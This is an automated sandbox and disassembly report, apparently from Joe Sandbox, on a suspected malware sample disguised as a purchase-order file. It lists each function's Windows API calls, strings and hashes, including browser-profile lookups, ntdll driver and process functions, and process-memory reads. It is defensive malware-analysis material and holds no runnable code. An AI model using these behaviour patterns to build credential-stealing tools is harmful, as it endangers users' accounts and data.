                                                              • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                              • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              • {Unknown}, xrefs: 004132A6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+Fw@FFw@BFw
                                                              • API String ID: 667068680-2648589930
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 3143752011-1996832678
                                                              • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                              • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 1607361635-601624466
                                                              • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                              • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                              • wcscpy.MSVCRT ref: 004448B4
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                              • API String ID: 2899246560-1542517562
                                                              • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                              • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DBCD
                                                              • memset.MSVCRT ref: 0040DBE9
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                              • API String ID: 3330709923-517860148
                                                              • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                              • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040806A
                                                              • memset.MSVCRT ref: 0040807F
                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                              • memset.MSVCRT ref: 004081E4
